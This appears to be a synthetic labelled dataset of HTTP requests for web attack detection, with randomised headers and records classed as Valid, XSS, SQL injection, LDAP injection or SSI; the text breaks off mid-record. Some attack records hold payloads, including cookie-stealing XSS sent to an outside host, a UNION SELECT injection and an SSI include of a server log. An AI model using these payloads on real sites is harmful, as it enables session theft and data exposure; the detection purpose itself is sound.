Cookie: iutt2eXdiwwmar=reh;loru=034800;lwts=nn0an+rb;ii=789411;mi=n m2uicamlrla
Cookie2: $Version="5"
Date: Thu, 20 Jan 05 07:54:48 CET
ETag: W/"6Ji3x4muHJSPtbAphBb"
Expect: rbus
From: iemh1t6e@eoyhyfea.net
If-Modified-Since: Fri, 27 Feb 04 07:03:37 CET
If-Unmodified-Since: Thu, 01 Jan 09 20:36:56 CET
If-Match: "uyBYpeZEu7XdIL3ZxtP"
If-None-Match: *
If-Range: Sun, 12 Apr 09 19:33:10 CET
Max-Forwards: 186
MIME-Version: 1.9
Pragma: Rfs=uhtnm42
Proxy-Authorization: ahhtnk neqxl=dflxtij8
Authorization: Digest cnonce="dpmRst"
Range: 7-
Referer: http://www.EjmeW.st/afeyhai/mLEa.css
TE: trailers,trailers,deflate
Trailer: Via
User-Agent: Mozilla/2.0 (X11; U; Linux i386 3.1; 6d-sy; rv:5.4.1) Gecko/36263778
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5744x7610
Via: 4.0 100.157.231.133
Transfer-Encoding: gzip
Upgrade: n1e7/2.9, i0t/7.2, at8h/8.4, saae/0.1, F8sw4m/0.9
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 16119132
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17968
Start - Id: 30839
class: Valid
GET /awCn/Hhh/af.gif?cttCi=n%5Cmetalho%25u%7Eaonperlc%3A%25na&hpn1htben8e=e5va3&iphNpuaieip=e38&rm9wMZt0dX3nJ=tyqw6I%40%40Z6j-&ep0ettf2meE=97557875&sEooexiktra=homeabhtacces5fnb+koan7&t4i4uueosaa62=ernautoexecsy%3EhIricp HTTP/1.0
Host: 151.18.82.36
Connection: close
Accept: audio/basic, video/*;q=0.1, video/quicktime;q=0.5
Accept-Charset: iso-8859-5, iso-8859-15;q=0.7
Accept-Encoding: 
Accept-Language: 9-actikt;q=0.9, 0iErzQ-31, n-dJr;q=0.8
Cache-Control: only-if-cached
Client-ip: 148.238.116.80
Cookie: Q-Lw@=t;ehsecEi0eahes=8544;mSn=0063761779;Z7EtWoxBCu=divhha832eNxS;Darhr=zld
Cookie2: $Version="369"
Date: Sun, 25 Mar 07 18:23:45 CET
ETag: "KjGB5E69B2JxQ1uJ"
Expect: 100-continue
From: emai@qjb6cGS.org
If-Modified-Since: Sat, 21 Jun 08 08:30:46 CET
If-Unmodified-Since: Mon, 16 Jun 08 12:45:48 CET
If-Match: *
If-None-Match: "BchcDKA_cWABQHPnEwZD"
If-Range: "wyk0F5hzB4HcNm9"
Max-Forwards: 4649
MIME-Version: 8.2
Pragma: hLiaesK6='itFMN'
Proxy-Authorization: Bb9d hdnpTo6=rnIfs
Authorization: Digest uri=/Qsrzs/moosnjhN/NIilnze/egmta/saIea.mp3
Range: 532-
Referer: /t3tnti/Cooet/0dei5sfa/Ie5sTuW/d31v.cgi
TE: trailers,trailers,gzip;q=0.7
Trailer: Connection
User-Agent: Mozilla/5.8 (Windows; U; WinNT 1.9; tn-sl; rv:8.8.7) Gecko/64658454
UA-CPU: MIPS
UA-Disp: 072,6639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8282x452
Via: HTTP/2.3 213.180.91.145
Transfer-Encoding: deflate
Upgrade: ean/4.5, snh/8.7, gs4/8.9, tms/1.8
Warning: 487 www.3aeuzssp.html "5daxrei" "Sat, 28 Apr 07 04:33:31 UTC"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 940026202382470481
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 30839
Start - Id: 32108
class: Valid
GET /ej/taig.php?stlnn0t=6487&djdsdpoean=uys-&oLrrEtsdl=sD&thoanbit0olptoi=4537&ttehrdtlc=ptay1Oc HTTP/1.1
Host: 189.76.217.67
Connection: wEpr
Accept: image/*, image/gif, image/gif;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: e5ssdtp-rtidm3
Cache-Control: no-transform
Client-ip: 96.4.175.241
Cookie: mlnsdda=12602664;WpEhavingcUD7eF9P=713787;e2ctmD=2eene
Cookie2: $Version="62"
Date: Sun, 05 Mar 06 10:38:47 GMT
ETag: "D_Ls_R7aeBy36JCM7s"
Expect: znnrtj=5seob7w;erlhsae=uifl
From: nseuEe@2rAbhseur.gov
If-Modified-Since: Sun, 28 Jun 09 07:58:23 UTC
If-Unmodified-Since: Thu, 19 Jun 08 02:03:17 UTC
If-Match: "88lRnxK7h14evOd1TQHO"
If-None-Match: *
If-Range: Fri, 12 Jun 09 23:05:55 GMT
Max-Forwards: 588
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Digest opaque="dItqqor"
Range: 095730-
Referer: /tycira/r2ewe/juTnEPe.swf
TE: chunked,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.4 (compatible; MSIE 7.8; WinNT; eoed)
UA-CPU: 68000
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 367x7496
Via: FTP/0.8 123.36.166.1, FTP/6.5 161.203.4.102, 7.0 114.170.74.69:66134
Transfer-Encoding: deflate
Upgrade: ipadO/5.2, lbr/9.1, 5Dq/1.2, al1/0.6, aCann/7.0
Warning: 593 210.153.84.107 "domopgoe" 
X-Forwarded-For: 111.76.107.196
X-Serial-Number: 4047270
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32108
Start - Id: 46904
class: XSS
PUT /tFie8kTh8P8OAvu/li/aoG988JhN7LoE/mtuc/3nli/sas/iIritqWnz6xRMdGD/cdu@yvoCkUNtG1.tiff? HTTP/1.1
Content-Length: 303
Content-Language: wbmO,ftzkE1
Content-Encoding: deflate
Content-Location: /n6cm/ih1kd0ip.tar.gz
Content-MD5: bjB0aXdpZHlzMWhiNnVBbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 01:58:40 CET
Last-Modified: Sat, 30 May 09 01:52:59 GMT
Host: 83.72.102.180
Connection: keep-alive
Accept: text/*;q=0.5, text/*, audio/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress;q=0.9, gzip;q=0.9, gzip;q=0.5, compress
Accept-Language: rnT2nta0-U;q=0.5, nrm22s1-tcssnoue;q=0.3, jHzu-weOs;q=0.0
Cache-Control: min-fresh=2
Client-ip: 44.189.197.231
Cookie: glumbe=3764;ivateeJ=ros8iawe mh1s;nd=nartnautoexecsaaautoexeccsf;pounoe2h=cbc@eallhrysexec1t[ 
Cookie2: $Version="07"
Date: Sat, 03 Sep 05 20:17:26 UTC
ETag: "t@UnAXUQXOo_-9kX"
Expect: rezd8=ae1nY;5le1igo=1iciVsnl
From: nbfea3@yM2KA0.biz
If-Modified-Since: Sun, 29 Aug 04 18:31:05 CET
If-Unmodified-Since: Wed, 23 May 07 21:17:04 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Oct 04 04:44:41 CET
Max-Forwards: 4
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: http://enrsueet.st/hiAe/trxttu/wU1Rt/1s9gsi.asmx
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: derre0Dv (dBOH3L90kc; ej@NEmijB; sBzUMaP; 8P0veFPLi)
UA-CPU: MIPS
UA-Disp: 802,874,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8473x700
Via: rinlex/7.4 115.255.202.36
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

liseTtliptm8h=7yuxmla02th&oNggU637t6=9686&tereaa0=<bgsound    src   =  " javascript:  [document.location.replace    ('http://www.chrinsie.com/cgi-bin/ti.cgi'+document.cookie);]     ">&H9ie=hgt JrT&LZtmpQFR_H5=5212&Sne=921&6AYFRkX5mB=8972786&ftpiWb3n9metaC-Nb=h<99

End - Id: 46904
Start - Id: 38477
class: LdapInjection
GET /sveneit2rqK/u6SIyd-Qo-.tiff?ntjoa3Ax=eanga1isyhhtot0&lbmt=et&ir=i&lhafuosman=arestMnoeurt4&KG7iCxBqd=oGJeKaHq8&cnr7wnesa=8TpD2ixTdu&W@acceptEqESvE8httpk=Unph-gfi7%3ChIparw&ngbd=icxaYL&mQfn9ecOcse=%29++++%28%7C%28cn%3D*o+%27brien*%29%28mail+++%3D*o++++%27brien*+%29++&ntenourh=y HTTP/1.0
Host: www.csoazsrwto.uk
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: v-t3ilTrIe, oetT-eija;q=0.0
Cache-Control: no-transform
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="51"
Date: Sat, 20 May 06 18:30:05 CET
ETag: W/"HdLDJ1hGjmZABeS"
Expect: stre=tmrfue
From: odvt@tmdyhis.org
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: "jKCQg5FGd.9ccEl"
If-None-Match: *
If-Range: Tue, 16 Jan 07 21:56:23 CET
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic bm40czM6OGFvN2M=
Range: 24-,76759-,-19589
Referer: http://www.eae7hP.biz/tdtpdfan.gif
TE: chunked,gzip,gzip
Trailer: Warning
User-Agent: 64tch (stqEBQS; 4ePvFkeSI2; lapi2DOHce; rJsWIW1K6)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0403x7270
Via: HTTP/8.2 www.esNa.jpg, HTTP/4.2 50.206.238.222, 1.4 77.17.13.166
Transfer-Encoding: gzip
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 863 www.oneLt.gif "lrRpIern" "Sun, 11 Oct 09 06:27:08 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38477
Start - Id: 11422
class: Valid
GET /tEkelJJbsmapp1lSaghp/LXD/ri/rXT/eoaiIe65tws.css?liu5ott=re&Rsonsdidiire=13584&oJdhlinaeu=tl+etcHttt&eaasteTlseoheAk=i&roadm21e=18783&stigenkreshEtea=fiMAngJN&ttese=httpsmka&oT4nEehiynEgu=aTeapfT&oriy7=ey24.nI-q3Q&5MwoiKf=sBPnGR9CxC&TotdTee8ldtjh3e=aeeoo&6fUBvf.VZ=+o&.BMBZC20bin=aintrsnq9engv&SHMKhyUp=91518114 HTTP/1.0
Host: www.ssJSlegut.biz:3
Connection: mubwIy
Accept: */*;q=0.9
Accept-Charset: big5, utf-8, utf-7, euc-jp, x-mac-ce
Accept-Encoding: *;q=0.5
Accept-Language: drh7r-amgz;q=0.2
Cache-Control: no-transform
Client-ip: 148.233.33.178
Cookie: t9biurriStiste=ri sh%uo;7yna8l1rn=aaine;3p_A0INinclude9ITr=i;nnttdocmatW=bodyNcmjvoceRo=mocharlinki;te3E1=107105;xncte=e5dsenn
Cookie2: $Version="405"
Date: Mon, 06 Feb 06 10:49:20 UTC
ETag: "yX9Em7sifjKXLAVjnj"
Expect: msWdr5l=cetnxz3t;stme5
From: iElwxs5p@8am8xdh.it
If-Modified-Since: Wed, 17 Mar 04 04:50:19 UTC
If-Unmodified-Since: Sun, 11 Apr 04 14:11:46 CET
If-Match: *
If-None-Match: "Jg8uqrrgQVX5rLi5wET"
If-Range: Wed, 17 Sep 08 21:13:21 GMT
Max-Forwards: 367
MIME-Version: 4.6
Pragma: neM='ent'
Proxy-Authorization: Basic emh0UjpkeXN0ZWw=
Authorization: igeh 68ibd=sq5oie
Range: 140184-,29-
Referer: /bnEhvlt/feeisthe/ulizneu.asp
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.0 (Windows; U; Windows NT 6.6; 6s-db; rv:9.7.0) Gecko/49606393
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 167x1017
Via: 0.4 www.oNt4O3ah.png
Transfer-Encoding: identity
Upgrade: mee/7.7, coi/1.5, plalfl/9.5, 1ocfo/7.9, tsoiin/2.5
Warning: 573 90.107.83.182:9973 "lttoC2rteccnokatt" "Tue, 21 Apr 09 10:53:32 CET"
X-Forwarded-For: 24.107.212.67
X-Serial-Number: 550681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11422
Start - Id: 41483
class: SqlInjection
POST /jyedlseixuAannmi/wgetq3I50V.jpg? HTTP/1.1
Content-Length: 243
Content-Language: fa,R,eaod7tm
Content-Encoding: compress
Content-Location: http://cEte.uk/e6Oe9t1e/unre0si/mars/pu0nai.msf
Content-MD5: d2lhYm90bGF5OHd0d25oaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Fri, 10 Dec 04 15:26:09 CET
Host: www.oahoe.be:089
Connection: keep-alive
Accept: image/png, video/quicktime;q=0.1, application/rtf
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: nf='Dtus0'
Client-ip: 212.10.247.26
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="5"
Date: Wed, 06 Aug 08 09:50:24 CET
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: 100-continue
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Wed, 30 Jun 04 06:07:35 UTC
If-Unmodified-Since: Wed, 02 Jan 08 14:54:51 GMT
If-Match: *
If-None-Match: "NGZN@PIl7RTt_FLnOms"
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 2101
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: g5d2Mh M5dp=srarh
Range: 78-403185
Referer: http://dohinoce.net/1oegpss/5een/suoni7L/ehneIh.jpg
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: sCobnAeaeatchmdra
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8426x777
Via: pwyNs/2.4 224.117.63.3
Transfer-Encoding: seea; mtieaOrd=dwtxeuto
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tlheapte=H&hOxaoNounsaNt=fxYUpcO&4erpfaeppwlmegs=whcs'&tdt1Qh5nk=8uro&du69torba=oP c&eota=3316&shli='    UNION        ALL    SELECT    rhc     FROM    HsLsEtahF   WHERE    '' =   '&idsuscsasSu1au=nPs&tz5cnfN0oiel=Ia&emZBr4Wx=058489

End - Id: 41483
Start - Id: 33317
class: Valid
POST /AHq/eAaxtBanemdttodde/r2it6.p9k7Wx-0DAl/group byQ/Rw50Lrei/DiI/scPl7Xcvg_/mtacso3bttju/Ornslftt.tiff? HTTP/1.0
Content-Length: 131
Content-Language: i9n,teo
Content-Encoding: identity
Content-Location: http://www.uzdl.gov/t9Eehnvo/dhuezyhh/eii9t/7iFembn.cgi
Content-MD5: aGVvYW1saGVvYWFOanRkZg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 10 03:19:11 UTC
Last-Modified: Thu, 24 Aug 06 24:13:33 GMT
Host: 159.55.62.189
Connection: tkI7D6rR
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.8, identity
Accept-Language: nl6reirr-dliiepei;q=0.0, sjqt5-i1rlur, m-onrsayn, e-n1te
Cache-Control: no-transform
Client-ip: 161.3.132.174
Cookie: gauoea3itaze=95;4wgetUiML0VnOIl=10656;ariatct=$tRen<ftprlusr\8;xwe9cquofseiqhf=@nv
Cookie2: $Version="3"
Date: Thu, 19 May 05 14:03:43 CET
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: 100-continue
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Wed, 26 Apr 06 24:23:30 GMT
If-Unmodified-Since: Mon, 12 Oct 09 03:34:17 GMT
If-Match: "sTpH5lCRrTOY4pLoTn"
If-None-Match: "GF1X9Zh2OQLWQ7eMXbX"
If-Range: Sat, 13 May 06 14:26:45 CET
Max-Forwards: 026
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dw2tl"
Authorization: Basic b2VhaWRsOm51YWU=
Range: 6-,39-,43-
Referer: /cbc1ls/soOhRweo/aatidht/lebwyp/toesbe.pl
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/7.3 (X11; U; Open BSD i386 8.4; ie-hp; rv:6.6.1) Gecko/53972705
UA-CPU: StrongARM
UA-Disp: 6993,500,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8624x050
Via: 3.3 www.lrta3O1o.htm, 2.8 www.atrs6.html
Transfer-Encoding: dThN
Upgrade: cTrtu/8.5
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 0152734309
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7PlnAZ=3368650&9ddao1p=mxp_nn&aiUmsuruwy=k7erbctmailmub&d8=eOVFUPJ4.au.&iglrv62=7&positionD0UsuLwsautoexecscript=droprzaastnzerThAb

End - Id: 33317
Start - Id: 21693
class: Valid
GET /ulqhB8c/hq/4c6kaedrna3n8/s8himosis4if/eD7WNPSaziBs3g-sE/fF@D6/adEwhZWWD_6uuB5q.php3? HTTP/1.0
Host: www.neawcnp.st
Connection: hhf1taA0
Accept: video/*;q=0.3
Accept-Charset: iso-8859-3;q=0.6, ks_c_5601-1987, cp-950;q=0.2, windows-1258, iso-8859-15
Accept-Encoding: 
Accept-Language: o-8s;q=0.4, 0nttd-4weyv, atOd-brnp6;q=0.9, anzda-nwtn79t
Cache-Control: no-transform
Client-ip: 240.217.117.249
Cookie: hyidreifmWoE=70\bzusew;nsmciWn=trI;ctT4hsIfnpycts=2nrkds;vf51ea=aEform;tiaya9oiV=e/'utIeae
Cookie2: $Version="9"
Date: Mon, 09 Apr 07 03:53:43 CET
ETag: W/"Dv1uMP8Hv4QitlIlBLDW"
Expect: suti=AmRw
From: fhnah0@pcVodthnoa.com
If-Modified-Since: Wed, 20 Apr 05 07:29:06 UTC
If-Unmodified-Since: Wed, 06 Apr 05 15:46:08 UTC
If-Match: "@slnfGhoht-bB.966r"
If-None-Match: "HKfL5-tEfHfLMstF"
If-Range: *
Max-Forwards: 9283
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: zlkAcr cnfcci=ifhphtEe
Authorization: Basic bmxsb286bmd5cmRvbzg=
Range: 6854-805189,4305-14775
Referer: /mshoct/jts3ttnp/7ai1s.mspx
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/7.1 (Windows; U; Win98 6.5; tw-jz; rv:0.3.1) Gecko/15927120
UA-CPU: StrongARM
UA-Disp: 6270,1333,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 664x378
Via: 1.9 167.17.97.162, sSuQ6n/9.0 www.8lqaD.gif
Transfer-Encoding: gzip
Upgrade: Abae/9.2, 23ehie/8.6, esDl/9.5, y7tfvd/4.7, aiC/7.6
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 36.156.86.13
X-Serial-Number: 07885
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21693
Start - Id: 19011
class: Valid
GET /hsEtt/0MVrIqF6nHA/wsedEr2rax9mtid7yx/Zei/t8YH@oXJIJph_URZBV/rjAvofs@4bLfcyekch.pl?ohtt=456663&nithyyu=1&rCsaagZ6=%27A+o+like%5C6i HTTP/1.1
Host: www.lfb9otcfMn.fr
Connection: ipemgie
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress, gzip
Accept-Language: 1fnTp-vk, oa-t2rbuncq, nN-zQ;q=0.8
Cache-Control: only-if-cached
Client-ip: 227.16.86.109
Cookie: WhXU.W@S=kSeix bjuonsb
Cookie2: $Version="62"
Date: Thu, 14 Oct 04 03:50:19 CET
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: teiyc@nuhni81dA.fr
If-Modified-Since: Fri, 02 Apr 04 09:00:05 GMT
If-Unmodified-Since: Wed, 25 Nov 09 17:36:24 GMT
If-Match: *
If-None-Match: *
If-Range: "M7UaOJ7esB@ZvNe"
Max-Forwards: 17
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic dDFzaGRzaXU6c2VkaUllMg==
Authorization: Basic c2U1b1Q6ZXRvaHV0ZWM=
Range: -00,5-,-68
Referer: http://hlrg.cz/hlrgnei/s9Ee2ot/izip/anegmr/hr4hrs.jpg
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 0.3; lf-ht; rv:8.7.1) Gecko/31956459
UA-CPU: 68000
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: FTP/9.5 www.hdeehnl.png, 85nx/0.1 163.191.8.121:34498
Transfer-Encoding: gzip
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19011
Start - Id: 39582
class: SSI
GET /s1tmztYrF/tu.aspx?rasqcenpb9Nna=368225&enaaoyPkdsaFAT=185585753&aybfKescmi5idgt=rreehnindrfiile&xT6UOLwinntQ5zV=OtnedDelstdine&neeemKO3a=lo0enasaatedsx&_FjdCErV@insertOchild=tu-edpvj2&kWbOSqW6yJ=%3C%21--++%23include++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+--%3E HTTP/1.1
Host: 94.156.138.90
Connection: agleahe3
Accept: */*
Accept-Charset: windows-1250;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.3
Client-ip: 241.190.56.140
Cookie: WFKUQL9=eWF8RiGcy;stanaetnuq=e7r9j)ke%;t0r
Cookie2: $Version="759"
Date: Sat, 06 Sep 08 14:53:59 CET
ETag: "QQaFNHDxvsmJsy85@QP"
If-Unmodified-Since: Fri, 07 Jan 05 14:28:19 GMT
Max-Forwards: 8
Pragma: rnnehwl='m0n54'
Range: 5591-,251722-40474
Referer: http://sxeo.biz/eaXetCx/Omac.aspx
User-Agent: xOalrn1RgdssvET
UA-Disp: 779,442,32
Via: mslntd/8.8 232.20.211.46
Transfer-Encoding: gzip

null

End - Id: 39582
Start - Id: 27195
class: Valid
GET /emaaejt/Ocat/IL1qQzaVyQ6nBexec/aot1detHalsedmgl/qSHPrAystplehqodla/oExMItx3lUtlDiwNnr-U/esayk/sKTwRiFGjb/teFBOM/PJZsC5RZauMh/ePuf9ansoivH2eBn.jpg?eqliohrnvs80l=23&IshutdownfncQ-XgwEH1=16301&heul=bOw403&ewoofaq5=3587245&htftlhq=%3Ewinnt&sm=puR&fhtot=4oahgeignoe8rmjy0&p.7EJd2sRxp_=Asbodynmexecn&eanm=en&ze=cSw._Zgf-&perimsetn3=3e%25uowstrnycd%2Fro8+l&tefsbuoE=leN7H.Q&0ee57eno=Egruwus&eOoJfbencttoS=t4nwp-rEl HTTP/1.0
Host: www.en1cbyo.gov:021
Connection: close
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312, cp-936, cp-932;q=0.4, x-mac-hebrew, ks_c_5601-1987
Accept-Encoding: identity, gzip;q=0.2, compress
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 177.226.50.169
Cookie: oe3YtmpM0=gagtpmDhttpsrwsms3t;sr3=ddOvAhBhONw
Cookie2: $Version="818"
Date: Wed, 06 Sep 06 13:41:21 GMT
ETag: "v6laF5Qbp0MAbwY2Um"
Expect: BestoiDe
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Wed, 19 Jul 06 09:09:02 UTC
If-Unmodified-Since: Thu, 18 Oct 07 07:52:05 CET
If-Match: "veHhOwRG7HiOI7tjq"
If-None-Match: "SHyoP@fFSnxLCEpUCJ"
If-Range: *
Max-Forwards: 9
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Basic c2JxbmU6bndvaXU=
Range: 699285-,85178-1
Referer: /snoenlv/cewOws.mpeg
TE: trailers
Trailer: Connection
User-Agent: kinoI (e8EdA04o5; eXTCrc3; t7HJuw.@E; 2_gv7L; g4nrWujHJh)
UA-CPU: x86
UA-Disp: 451,9242,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3319x950
Via: HTTP/4.6 www.rovq.gif:0, HTTP/9.3 213.132.249.172
Transfer-Encoding: gzip
Upgrade: Etiah/8.1, hsg/1.5
Warning: 205 www.ei0rwv4l.html "chsie5ekaqdatn" 
X-Forwarded-For: 202.203.219.213
X-Serial-Number: 437437535
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27195
Start - Id: 47243
class: XSS
GET /ooNehatgsx/goakhna/ar_hIDQw/a7q.pl?pCiTCheretbdua=sf%29gbtelnetxELWziuu&npIAmagEioxsn=%3Cimg++src++++%3D++++%22+++++sechalat%3E+++%22+++++onmouseover%3D++%22++%5Bwindow.open%28%27http%3A%2F%2F60.24.127.187%2Frase.php3%27%2Bdocument.cookie%29%3B%5D%22+++%3E&6ca3Gweo=yinemeldroprauhhjgo%3Fn%7El HTTP/1.0
Host: www.9rEoagoPdr.uk
Connection: close
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: acsrb-hqd, 9-n2seH;q=0.3
Cache-Control: no-transform
Client-ip: 189.169.187.15
Cookie: Heiooc=iscC8;td4rlosmhrrznq=otUq@sAUI;caom=30;5wp-.Cd=01;Uptenojr=uAqLKC0cujn
Cookie2: $Version="66"
Date: Tue, 01 Aug 06 12:35:02 CET
ETag: "CgBR0KGBgPHp6zrph"
Expect: ltaUwimt=sm2Reitr
From: npuaaot@jotm34.net
If-Modified-Since: Tue, 04 Sep 07 07:51:14 CET
If-Unmodified-Since: Wed, 20 Oct 04 16:03:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -3
Referer: /ltntb/1etsqu/7xefu.pdf
TE: trailers,trailers,gzip
Trailer: Max-Forwards
User-Agent: OtteerAuHs
UA-CPU: Sparc
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: HTTP/4.8 www.1rmIlfe.js, HTTP/0.9 www.q03r.js:8, 2aae/0.4 www.wao7.tiff
Transfer-Encoding: identity
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 47.247.175.175
X-Serial-Number: 15152704800
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47243
Start - Id: 11549
class: Valid
GET /Z0/iVNiqZZkBP/Xyzi7cQ/fvYRGYyJiAB/oiasw8istis/E9SuL8PR/suwvHMe1AnQg6V/dnPCEK7/eZW@dJ6/thwuem5tzee/ztedhoRieynlhakeeo/2seA.msf?tGgeisR=vpag&gaoidu=9&da8ewmhf8zumois=ostsd&gnTseP4zeAgEatt=js6tnc3a&j._U=%3Bs&Rboot.inir_UNUF7=721522&8tm9ei5=iarEirsoldgKjr9ba&entotaeenegp=02369&ee9dhydadnn=m3noinanNou&ttwrasoueNr8e=ou7%5Coo&eos3xmAs=pi5ho+3lieoc&staes8leaflrre=aNelid&lyfcd=83303 HTTP/1.1
Host: 75.73.169.14
Connection: close
Accept: audio/*, application/x-tar;q=0.2, text/*;q=0.3
Accept-Charset: windows-1251, koi8-r;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: rra7dc=o
Client-ip: 20.170.229.99
Cookie: nf=ehtxp_T
